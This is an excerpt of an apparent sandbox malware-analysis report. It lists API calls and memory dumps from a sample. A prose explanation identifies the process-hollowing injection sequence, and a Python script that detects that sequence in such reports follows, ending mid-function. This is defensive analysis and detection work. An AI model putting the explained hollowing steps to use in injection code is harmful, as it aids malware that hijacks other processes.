                                • Instruction Fuzzy Hash: BA41869160E7D14FD303973898686597FB2AF87115F2E01DBC186CF6E3D9298C0A83A6
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2707648230.0000000008250000.00000040.00000800.00020000.00000000.sdmp, Offset: 08250000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8250000_Xc501VOacR.jbxd
                                Similarity
                                • API ID:
                                • String ID: Haq$Haq
                                • API String ID: 0-4016896955
                                • Opcode ID: 671e0de9204c4059d6d68415320cd1addd64dc6c6b1aeb7b533d2b31e6cea774
                                • Instruction ID: fb8cec0ba9935fcaeca684420e852c220d2c4116a18adb219ab72d4ddf413289
                                • Opcode Fuzzy Hash: 671e0de9204c4059d6d68415320cd1addd64dc6c6b1aeb7b533d2b31e6cea774
                                • Instruction Fuzzy Hash: 12D1B071A142158FC709FBB8E8981AE7FB6EFC9310F84486DD449E7384DE385C4687A6
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2694497413.0000000002CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2cd0000_Xc501VOacR.jbxd
                                Similarity
                                • API ID:
                                • String ID: 4']q$4']q
                                • API String ID: 0-3120983240
                                • Opcode ID: f3f8672f83ffacf40d0f4b57bbd0e0ad8146db4b83a6188afbf31d5aaeb01577
                                • Instruction ID: 0a213304262fa920aca746ba7ffe43384e28e8f30e494c3e8605ba6441aa738d
                                • Opcode Fuzzy Hash: f3f8672f83ffacf40d0f4b57bbd0e0ad8146db4b83a6188afbf31d5aaeb01577
                                • Instruction Fuzzy Hash: C9B14D347145119FDB299B3ACC9873D76AAEF84608F15406BE302CF3A5DB29DE42DB81
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2694497413.0000000002CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2cd0000_Xc501VOacR.jbxd
                                Similarity
                                • API ID:
                                • String ID: ,aq$,aq
                                • API String ID: 0-2990736959
                                • Opcode ID: 2f10c62ab0ed165ec565bb8e2da1f3e0b0326d86c811df7ef956bbc03d4762f7
                                • Instruction ID: 1c252de98d889b30eaa9a21f7829a444b956975733946d87159b34692f9c21c4
                                • Opcode Fuzzy Hash: 2f10c62ab0ed165ec565bb8e2da1f3e0b0326d86c811df7ef956bbc03d4762f7
                                • Instruction Fuzzy Hash: 1781BE35B401158FCB04DF69C884A6EF7B2FF89305B1581AAD60AEB364DB35EE49CB50
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2694497413.0000000002CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2cd0000_Xc501VOacR.jbxd
                                Similarity
                                • API ID:
                                • String ID: Haq$Haq
                                • API String ID: 0-4016896955
                                • Opcode ID: 8f255a2d4fcd8cda678e680c9fac86dfbc82043c7aaf4544b9d0562fe745b45e
                                • Instruction ID: 783c591694f48b91f48d62bd792d61908a091fec9aa24cb7bfb684d8828e5463
                                • Opcode Fuzzy Hash: 8f255a2d4fcd8cda678e680c9fac86dfbc82043c7aaf4544b9d0562fe745b45e
                                • Instruction Fuzzy Hash: B7819031B002159FCB05AF69D858BAEBBA6FF88740F148559FA069B390CF70DD85CB91
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2694497413.0000000002CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2cd0000_Xc501VOacR.jbxd
                                Similarity
                                • API ID:
                                • String ID: $]q$$]q
                                • API String ID: 0-127220927
                                • Opcode ID: 369ee0e9bb84a444c3e32ae1bc477da1c17afe098a016bdc3f8fa4e82c294918
                                • Instruction ID: 5ef44525c8530349125f5c4e2f1af2003c7223f0f53a0c5705873a3e73db6952
                                • Opcode Fuzzy Hash: 369ee0e9bb84a444c3e32ae1bc477da1c17afe098a016bdc3f8fa4e82c294918
                                • Instruction Fuzzy Hash: 8C618E357402048FCB199B69D89866E7BA6FF88700F1985AAE602DB391DF34DD42CB91
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2694497413.0000000002CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2cd0000_Xc501VOacR.jbxd
                                Similarity
                                • API ID:
                                • String ID: 8(Z$Te]q
                                • API String ID: 0-1953018242
                                • Opcode ID: 7104afb3a3e4392d73c6754edef43ce82fccf58ac43845b2ac9846e3f5108318
                                • Instruction ID: a25f4b4d5a86352478123d7ea5b34451aa4d5d2360cb90e6913d339cd52d4185
                                • Opcode Fuzzy Hash: 7104afb3a3e4392d73c6754edef43ce82fccf58ac43845b2ac9846e3f5108318
                                • Instruction Fuzzy Hash: F2613735A102149FD704DF69D898EA9BBF6FF88704F1684A9E506DB3A1CB71EC41CB90
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2694497413.0000000002CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2cd0000_Xc501VOacR.jbxd
                                Similarity
                                • API ID:
                                • String ID: Haq$Haq
                                • API String ID: 0-4016896955
                                • Opcode ID: 17b7538b1c984860a6a9de887bb527f9df434aa5111d41912290290a79979be1
                                • Instruction ID: 51ed36d1a92a20afbedc634ace846471e976d0866bb825bc1e09fe0cd77323ea
                                • Opcode Fuzzy Hash: 17b7538b1c984860a6a9de887bb527f9df434aa5111d41912290290a79979be1
                                • Instruction Fuzzy Hash: BB41AE356006699FDB159F29C844BAE7BE2FFC8308F068959E9058B394DF34DD42CBA1
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2694497413.0000000002CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2cd0000_Xc501VOacR.jbxd
                                Similarity
                                • API ID:
                                • String ID: 4']q$4']q
                                • API String ID: 0-3120983240
                                • Opcode ID: f8da453b9a894dafa7972759511bdf32ccea25d34a8fcbfdfa3a969c17aec383
                                • Instruction ID: 342e1c497db228bb67cb624b017eae0c284f71b492ab3c8d5e1305797556e61d
                                • Opcode Fuzzy Hash: f8da453b9a894dafa7972759511bdf32ccea25d34a8fcbfdfa3a969c17aec383
                                • Instruction Fuzzy Hash: 08F081363001043BDB181AAA9C5497A7FDFEFCC3A1B04442ABA59C7390DE65CD01C7A0
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2707648230.0000000008250000.00000040.00000800.00020000.00000000.sdmp, Offset: 08250000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8250000_Xc501VOacR.jbxd
                                Similarity
                                • API ID:
                                • String ID: TJbq$Te]q
                                • API String ID: 0-3147309840
                                • Opcode ID: 9dd3adc640f96c2c8d7437f05183e0eb5608ae53745f29721a8670e0dca65264
                                • Instruction ID: ea1aadd5833e315b8b869e176d862c8986e13172d09dd95707c8b7bbd6a6d63e
                                • Opcode Fuzzy Hash: 9dd3adc640f96c2c8d7437f05183e0eb5608ae53745f29721a8670e0dca65264
                                • Instruction Fuzzy Hash: 36F0F6317000114FC608AB7DA59893E76DBAFC9A243290099E50ACB3A5CD61DC0357D6
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2707648230.0000000008250000.00000040.00000800.00020000.00000000.sdmp, Offset: 08250000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8250000_Xc501VOacR.jbxd
                                Similarity
                                • API ID:
                                • String ID: Te]q
                                • API String ID: 0-52440209
                                • Opcode ID: 48c834e3a4bfa6d9f43ec6f9a6176224b28d87f95ea6efee261bfb94f31584d3
                                • Instruction ID: 4083aa7aae1f93b943bc2fecd9c7e0a7685ce965a22ebf4c3434c0dc978bfd95
                                • Opcode Fuzzy Hash: 48c834e3a4bfa6d9f43ec6f9a6176224b28d87f95ea6efee261bfb94f31584d3
                                • Instruction Fuzzy Hash: 91527F70A143258FC754FB78E89875DBBB6EB84304F8085A9D44CE7354EE389C99CB92
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2694497413.0000000002CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2cd0000_Xc501VOacR.jbxd
                                Similarity
                                • API ID:
                                • String ID: (o]q
                                • API String ID: 0-794736227
                                • Opcode ID: cdfbd08e790ce1f9e98cce2fbbe856eed2ad051ffd6b6db3d986fa63b2178719
                                • Instruction ID: 2aa8d70cb7116c7d0432d582eba5b3d94d48d2644bc626d49605286763acc89c
                                • Opcode Fuzzy Hash: cdfbd08e790ce1f9e98cce2fbbe856eed2ad051ffd6b6db3d986fa63b2178719
                                • Instruction Fuzzy Hash: 52126E79604106CFCB14CF68C588AAEBBF2FF88304F158669E606DB2A5D735ED81CB51
                                APIs
                                • VirtualProtect.KERNELBASE(?,?,?,?), ref: 0747BEAB
                                Memory Dump Source
                                • Source File: 00000000.00000002.2705387241.0000000007470000.00000040.00000800.00020000.00000000.sdmp, Offset: 07470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7470000_Xc501VOacR.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID:
                                • API String ID: 544645111-0
                                • Opcode ID: 06a2f79f7e9d1dd92ded20751eb3c69554ca744cf1894b3efa27f3ddb44d8b85
                                • Instruction ID: edc42b9b750e0958dda264d459caaec19c1d2ad3ad23a72575773d62f6d21c3d
                                • Opcode Fuzzy Hash: 06a2f79f7e9d1dd92ded20751eb3c69554ca744cf1894b3efa27f3ddb44d8b85
                                • Instruction Fuzzy Hash: 9941E5BB6042889FCB01CB5AD4443CABBF1EBC9322F20846BD595DB201C2385986CFF1
                                APIs
                                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0601148A
                                Memory Dump Source
                                • Source File: 00000000.00000002.2704368226.0000000006010000.00000040.00000800.00020000.00000000.sdmp, Offset: 06010000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6010000_Xc501VOacR.jbxd
                                Similarity
                                • API ID: CreateWindow
                                • String ID:
                                • API String ID: 716092398-0
                                • Opcode ID: 1463f66cdd21718c663b41dbcbfe2041b20f715b691f4379b746e74b99ffc3ed
                                • Instruction ID: 9822e8c624ad8e04342047d54f59e5a16f235302f8ff5b11c0010fee3dac4f68
                                • Opcode Fuzzy Hash: 1463f66cdd21718c663b41dbcbfe2041b20f715b691f4379b746e74b99ffc3ed
                                • Instruction Fuzzy Hash: F551BDB1D00309DFDB14CFA9D884ADEBFB5BF48314F24852AE919AB250D774A885CF91
                                APIs
                                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0601148A
                                Memory Dump Source
                                • Source File: 00000000.00000002.2704368226.0000000006010000.00000040.00000800.00020000.00000000.sdmp, Offset: 06010000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6010000_Xc501VOacR.jbxd
                                Similarity
                                • API ID: CreateWindow
                                • String ID:
                                • API String ID: 716092398-0
                                • Opcode ID: aeea293de14a8fc26c2b1968d2b3ab7893750ae1255b7aa59d614f717aa77cab
                                • Instruction ID: df4977a7b0afaba209f77cc46ca733edcd23f382556a5a15cfb2ddadbb74d1a8
                                • Opcode Fuzzy Hash: aeea293de14a8fc26c2b1968d2b3ab7893750ae1255b7aa59d614f717aa77cab
                                • Instruction Fuzzy Hash: 7641ACB1D003099FDB14CF9AC884ADEBFB5BF48314F24812AE919AB250D775A885CF90
                                APIs
                                • CallWindowProcW.USER32(?,?,?,?,?), ref: 060139F1
                                Memory Dump Source
                                • Source File: 00000000.00000002.2704368226.0000000006010000.00000040.00000800.00020000.00000000.sdmp, Offset: 06010000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6010000_Xc501VOacR.jbxd
                                Similarity
                                • API ID: CallProcWindow
                                • String ID:
                                • API String ID: 2714655100-0
                                • Opcode ID: 5a1324d080070238ea1d0c30f27bbd85177a026b4f7853861e179574f3a7d438
                                • Instruction ID: 8616aec62b1c1fec8d63ea07ee9591df1207a5284567d1f4d00d867c632830d4
                                • Opcode Fuzzy Hash: 5a1324d080070238ea1d0c30f27bbd85177a026b4f7853861e179574f3a7d438
                                • Instruction Fuzzy Hash: 604147B4910205CFDB54CF99C888AAABFF9FF88314F24C459E559AB320D774A845CFA0
                                APIs
                                • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 078CE6D0
                                Memory Dump Source
                                • Source File: 00000000.00000002.2705597487.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_78c0000_Xc501VOacR.jbxd
                                Similarity
                                • API ID: MemoryProcessWrite
                                • String ID:
                                • API String ID: 3559483778-0
                                • Opcode ID: 54cd5268b7a6e5128e1f7845ccb20090c42ec8dd5da64e98a691e831fff76209
                                • Instruction ID: cf97e712a91a1bb49a097a298ec8a3de879752c61761c40b4ef55f81351f1212
                                • Opcode Fuzzy Hash: 54cd5268b7a6e5128e1f7845ccb20090c42ec8dd5da64e98a691e831fff76209
                                • Instruction Fuzzy Hash: 982139B19003099FCB10DFA9C885BEEBBF5FF48310F10842AE959A7240C7789944CBA0
                                APIs
                                • Wow64GetThreadContext.KERNEL32(?,00000000), ref: 078CD896
                                Memory Dump Source
                                • Source File: 00000000.00000002.2705597487.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_78c0000_Xc501VOacR.jbxd
                                Similarity
                                • API ID: ContextThreadWow64
                                • String ID:
                                • API String ID: 983334009-0
                                • Opcode ID: faa183cb166dbdb949be252fd5876a21e57fc0b87feca3118ea07a29a8221cee
                                • Instruction ID: 7c799349866643660275abf536c24d31f9c40dae71187f984234018242120375
                                • Opcode Fuzzy Hash: faa183cb166dbdb949be252fd5876a21e57fc0b87feca3118ea07a29a8221cee
                                • Instruction Fuzzy Hash: 4A2138B1D002098FDB10DFAAC5857EEBBF4EF48314F10842AD559A7240CB78A944CFA1
                                APIs
                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 078CF0AE
                                Memory Dump Source
                                • Source File: 00000000.00000002.2705597487.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_78c0000_Xc501VOacR.jbxd
                                Similarity
                                • API ID: ContextThreadWow64
                                • String ID:
                                • API String ID: 983334009-0
                                • Opcode ID: 97309ae6d4859c8caaec2f3cf27acb19533b536dddd85ad068ab3048c0a28ed8
                                • Instruction ID: e87800868e9e117fd274538a45a04006fb7c574069165da8c5161a6bcf366598
                                • Opcode Fuzzy Hash: 97309ae6d4859c8caaec2f3cf27acb19533b536dddd85ad068ab3048c0a28ed8
                                • Instruction Fuzzy Hash: DD2135B29002098FDB10DFAAC4857EEBBF5EF48314F10842AD559A7240CB78A945CFA1
                                APIs
                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0535CDE7
                                Memory Dump Source
                                • Source File: 00000000.00000002.2703407622.0000000005350000.00000040.00000800.00020000.00000000.sdmp, Offset: 05350000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_5350000_Xc501VOacR.jbxd
                                Similarity
                                • API ID: DuplicateHandle
                                • String ID:
                                • API String ID: 3793708945-0
                                • Opcode ID: 26daf857e732eb68eab25b6a0c51af06a82098ceede9ce935f772b03996b8f31
                                • Instruction ID: 2ebde1808bdef1891ce3291b7d3efe25ccb1e676f594dbf48f9633c946cf4dc8
                                • Opcode Fuzzy Hash: 26daf857e732eb68eab25b6a0c51af06a82098ceede9ce935f772b03996b8f31
                                • Instruction Fuzzy Hash: D021E6B59003489FDB10CF9AD585ADEBFF4FB49324F14841AE918A3350D378A940CFA1
                                APIs
                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0535CDE7
                                Memory Dump Source
                                • Source File: 00000000.00000002.2703407622.0000000005350000.00000040.00000800.00020000.00000000.sdmp, Offset: 05350000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_5350000_Xc501VOacR.jbxd
                                Similarity
                                • API ID: DuplicateHandle
                                • String ID:
                                • API String ID: 3793708945-0
                                • Opcode ID: ba941dc411dd938e29a1e4dbda37621b51c6186039f44d2388c2f2d9fba6adb0
                                • Instruction ID: 02a1fcb75e6b13c519d69796d477c4e30b31ca5a9fd0a9dfee595dddc307feb9
                                • Opcode Fuzzy Hash: ba941dc411dd938e29a1e4dbda37621b51c6186039f44d2388c2f2d9fba6adb0
                                • Instruction Fuzzy Hash: 5C21C4B59002499FDB10CF9AD985ADEBFF9FB48324F14841AE918A3350D378A944CFA5
                                APIs
                                • VirtualProtect.KERNELBASE(?,?,?,?), ref: 078C4ABB
                                Memory Dump Source
                                • Source File: 00000000.00000002.2705597487.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_78c0000_Xc501VOacR.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID:
                                • API String ID: 544645111-0
                                • Opcode ID: 470fb77e8f04553dcf1d6f85395becc726e44c36d21b15d386865a659285f953
                                • Instruction ID: 06fb507c3b81a32d00609c17655ae0798d1780ac1373165d0376914403780e00
                                • Opcode Fuzzy Hash: 470fb77e8f04553dcf1d6f85395becc726e44c36d21b15d386865a659285f953
                                • Instruction Fuzzy Hash: D72108B59002499FCB10DF9AC484ADEFBF4FF49320F108429E958A7250D378A544CFA5
                                APIs
                                • VirtualProtectEx.KERNELBASE(?,?,?,?,?), ref: 078CEE07
                                Memory Dump Source
                                • Source File: 00000000.00000002.2705597487.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_78c0000_Xc501VOacR.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID:
                                • API String ID: 544645111-0
                                • Opcode ID: 79ba8d3794cbcc42841dedcd408b515cb9480bbfb56db4b2a4859c712cdb9aed
                                • Instruction ID: b2492942006722626db46b614b92a2f21d1b2bce400bcdc48393f52a784838c6
                                • Opcode Fuzzy Hash: 79ba8d3794cbcc42841dedcd408b515cb9480bbfb56db4b2a4859c712cdb9aed
                                • Instruction Fuzzy Hash: 232127B1C002099FDB10DFAAC444AEEFBF5FF48320F50842AD519A7250DB79A945DFA1
                                APIs
                                • DeleteFileW.KERNELBASE(00000000), ref: 0823C668
                                Memory Dump Source
                                • Source File: 00000000.00000002.2707451290.0000000008230000.00000040.00000800.00020000.00000000.sdmp, Offset: 08230000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8230000_Xc501VOacR.jbxd
                                Similarity
                                • API ID: DeleteFile
                                • String ID:
                                • API String ID: 4033686569-0
                                • Opcode ID: 228d77894beccde2014553ad41927242c657d0133391990b56502cf682674d52
                                • Instruction ID: a9b31de94552effa5b0f515e1cdae241b781f1f01d67aa5edd497f47424273f4
                                • Opcode Fuzzy Hash: 228d77894beccde2014553ad41927242c657d0133391990b56502cf682674d52
                                • Instruction Fuzzy Hash: CB1106B1C0065A9FCB14DF9AC545A9EFBB4EF48720F15852AD818B7240D738AA44CFA5
                                APIs
                                • VirtualProtect.KERNELBASE(?,?,?,?), ref: 0747BEAB
                                Memory Dump Source
                                • Source File: 00000000.00000002.2705387241.0000000007470000.00000040.00000800.00020000.00000000.sdmp, Offset: 07470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7470000_Xc501VOacR.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID:
                                • API String ID: 544645111-0
                                • Opcode ID: ac6e1d2b3e833e75b7ee2a057cca65812bcfcc0fb91fd23ec00db4793741018e
                                • Instruction ID: a493aee0005f06754da22cde2067c7f247308999e197180db40a91f9080045db
                                • Opcode Fuzzy Hash: ac6e1d2b3e833e75b7ee2a057cca65812bcfcc0fb91fd23ec00db4793741018e
                                • Instruction Fuzzy Hash: 3321B3B59002499FCB10DF9AD584ADEFBF8FF49320F10842AE958A7351D378A544CFA5
                                APIs
                                • VirtualProtect.KERNELBASE(?,?,?,?), ref: 078C4ABB
                                Memory Dump Source
                                • Source File: 00000000.00000002.2705597487.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_78c0000_Xc501VOacR.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID:
                                • API String ID: 544645111-0
                                • Opcode ID: 2b89f5eb329637af94a067b5d4a1c2cae6440d505c5f18a928ebdf231549a63b
                                • Instruction ID: 0457bb156fe5c04e377829ecc38250586b531ef34d1e60eb5fd63202333d373a
                                • Opcode Fuzzy Hash: 2b89f5eb329637af94a067b5d4a1c2cae6440d505c5f18a928ebdf231549a63b
                                • Instruction Fuzzy Hash: B821E4B59002499FCB10DF9AC484BDEFBF4FF48320F14842AE958A7250D378A544CFA5
                                APIs
                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 078CDF6E
                                Memory Dump Source
                                • Source File: 00000000.00000002.2705597487.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_78c0000_Xc501VOacR.jbxd
                                Similarity
                                • API ID: AllocVirtual
                                • String ID:
                                • API String ID: 4275171209-0
                                • Opcode ID: 24dd6616750e6a2b8d1456d0dea19e01c8b732d2492b0e47e1288c71be70a2c1
                                • Instruction ID: 9b1e0e861b130043bf014765e91605ef8dcee8039dd1cd9bc86fb125fffc07ce
                                • Opcode Fuzzy Hash: 24dd6616750e6a2b8d1456d0dea19e01c8b732d2492b0e47e1288c71be70a2c1
                                • Instruction Fuzzy Hash: 6C1137B19002499FCB10DFAAC844AEFBFF5FF48314F108819E519A7250C779A944CFA1
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.2705597487.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_78c0000_Xc501VOacR.jbxd
                                Similarity
                                • API ID: ResumeThread
                                • String ID:
                                • API String ID: 947044025-0
                                • Opcode ID: 240e59708992a45c86388c7ad1b22786279ccdb2d772ae0aabe40b6ba2029024
                                • Instruction ID: 0bbd736aa530f68297cdaa93cb4bfc27c037047a38261c48226604f4181b12f6
                                • Opcode Fuzzy Hash: 240e59708992a45c86388c7ad1b22786279ccdb2d772ae0aabe40b6ba2029024
                                • Instruction Fuzzy Hash: 12113AB1D002498FDB10DFAAC4457EEFBF5EF88314F208819D519A7240CB79A544CBA4
                                APIs
                                • PostMessageW.USER32(?,00000010,00000000,?), ref: 078CF795
                                Memory Dump Source
                                • Source File: 00000000.00000002.2705597487.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_78c0000_Xc501VOacR.jbxd
                                Similarity
                                • API ID: MessagePost
                                • String ID:
                                • API String ID: 410705778-0
                                • Opcode ID: 88a22135df86db3516905cca92411bf58fc7c4acbe3778c2a67af626dda789e7
                                • Instruction ID: 7ff4ed1c1b9be95f962e827e064b339a8d82a2a3b3e5417cfa67065bf48a3f17
                                • Opcode Fuzzy Hash: 88a22135df86db3516905cca92411bf58fc7c4acbe3778c2a67af626dda789e7
                                • Instruction Fuzzy Hash: AE1106B6800349DFDB10DF99C485BDEBBF8EB59314F108459E958A7340C379A944CFA1
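The "APIs" entries above from the 078C0000 dump region (WriteProcessMemory, Wow64GetThreadContext, Wow64SetThreadContext, VirtualProtectEx, VirtualAllocEx, ResumeThread) are the textbook process-hollowing sequence behind the "Injects a PE file into a foreign processes" and "Creates a process in suspended mode" signatures: allocate in the suspended child, write the payload, fix protections, redirect the thread's entry point via the thread context, resume. The Wow64 variants of the context calls mean the thread being redirected is a 32-bit (WOW64) thread. The PostMessageW call in the same region passes uMsg 0x0010, which is WM_CLOSE. The following Python is an added example, not Joe Sandbox code or the sample's code: it parses API bullet lines in the format shown in this section, groups them by the dump region the disassembler reported them in, and flags regions whose API set matches a hollowing signature. The sample text is constructed from the API lines listed above (the source-file lines are shortened); the signature itself, the decision to treat Wow64*ThreadContext as interchangeable with the non-Wow64 calls, and the `ref >= region` sanity check are assumptions of this example. ResumeThread is left out of the sample because the report shows no call site for it.

```python
"""Flag process-hollowing API sets in a Joe Sandbox code-block listing.

Added example; the hollowing signature below is an assumption for this
example, not a Joe Sandbox rule.
"""
import re
from collections import defaultdict

# One API bullet per code block, e.g.
#   • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 078CE6D0
API_LINE = re.compile(
    r"^\s*•\s*(?P<api>\w+)\.(?P<module>\w+)\((?P<args>[^)]*)\),"
    r"\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)
# The dump region follows on the "Source File ... Offset: XXXXXXXX" line.
OFFSET_LINE = re.compile(r"Offset:\s*(?P<offset>[0-9A-Fa-f]{8})")

# Hollowing signature (assumption): every REQUIRED slot must be hit by at
# least one of its alternatives; CORROBORATING calls raise confidence.
REQUIRED = (
    {"VirtualAllocEx"},
    {"WriteProcessMemory"},
    {"SetThreadContext", "Wow64SetThreadContext"},
)
CORROBORATING = {
    "GetThreadContext", "Wow64GetThreadContext",
    "VirtualProtectEx", "ResumeThread", "NtUnmapViewOfSection",
}
# Fixed Win32 window-message constants; only the ones this example decodes.
WM_NAMES = {0x0010: "WM_CLOSE", 0x0012: "WM_QUIT"}

# Constructed sample: API lines copied from the report section, source-file
# lines shortened to the part the parser needs.
SAMPLE_REPORT = """\
• VirtualProtect.KERNELBASE(?,?,?,?), ref: 0747BEAB
• Source File: dump.sdmp, Offset: 07470000, based on PE: false
• CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0601148A
• Source File: dump.sdmp, Offset: 06010000, based on PE: false
• CallWindowProcW.USER32(?,?,?,?,?), ref: 060139F1
• Source File: dump.sdmp, Offset: 06010000, based on PE: false
• WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 078CE6D0
• Source File: dump.sdmp, Offset: 078C0000, based on PE: false
• Wow64GetThreadContext.KERNEL32(?,00000000), ref: 078CD896
• Source File: dump.sdmp, Offset: 078C0000, based on PE: false
• Wow64SetThreadContext.KERNEL32(?,00000000), ref: 078CF0AE
• Source File: dump.sdmp, Offset: 078C0000, based on PE: false
• DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0535CDE7
• Source File: dump.sdmp, Offset: 05350000, based on PE: false
• VirtualProtect.KERNELBASE(?,?,?,?), ref: 078C4ABB
• Source File: dump.sdmp, Offset: 078C0000, based on PE: false
• VirtualProtectEx.KERNELBASE(?,?,?,?,?), ref: 078CEE07
• Source File: dump.sdmp, Offset: 078C0000, based on PE: false
• DeleteFileW.KERNELBASE(00000000), ref: 0823C668
• Source File: dump.sdmp, Offset: 08230000, based on PE: false
• VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 078CDF6E
• Source File: dump.sdmp, Offset: 078C0000, based on PE: false
• PostMessageW.USER32(?,00000010,00000000,?), ref: 078CF795
• Source File: dump.sdmp, Offset: 078C0000, based on PE: false
"""


def parse_api_entries(text):
    """Return one dict per API bullet, with the dump region attached."""
    entries, pending = [], None
    for line in text.splitlines():
        m = API_LINE.match(line)
        if m:
            pending = {
                "api": m["api"], "module": m["module"],
                "args": m["args"].split(",") if m["args"] else [],
                "ref": int(m["ref"], 16), "region": None,
            }
            entries.append(pending)
            continue
        m = OFFSET_LINE.search(line)
        if m and pending is not None and pending["region"] is None:
            pending["region"] = int(m["offset"], 16)
    return entries


def apis_by_region(entries):
    """Map each dump region to the set of API names called from it."""
    by_region = defaultdict(set)
    for e in entries:
        if e["region"] is None or e["ref"] < e["region"]:
            raise ValueError(f"call site {e['ref']:08X} has no plausible region")
        by_region[e["region"]].add(e["api"])
    return dict(by_region)


def find_hollowing_regions(entries):
    """Regions hitting every REQUIRED slot, with the matching call names."""
    hits = {}
    for region, apis in apis_by_region(entries).items():
        if not all(slot & apis for slot in REQUIRED):
            continue
        required = []
        for slot in REQUIRED:
            required.extend(sorted(slot & apis))
        hits[region] = {
            "required": required,
            "corroborating": sorted(CORROBORATING & apis),
            # Wow64*ThreadContext operate on a 32-bit (WOW64) thread context.
            "wow64_target": any(a.startswith("Wow64") for a in apis),
        }
    return hits


def decode_post_message(entry):
    """Name the uMsg literal of a PostMessage call, or None if unknown."""
    if entry["api"] not in ("PostMessageW", "PostMessageA") or len(entry["args"]) < 2:
        return None
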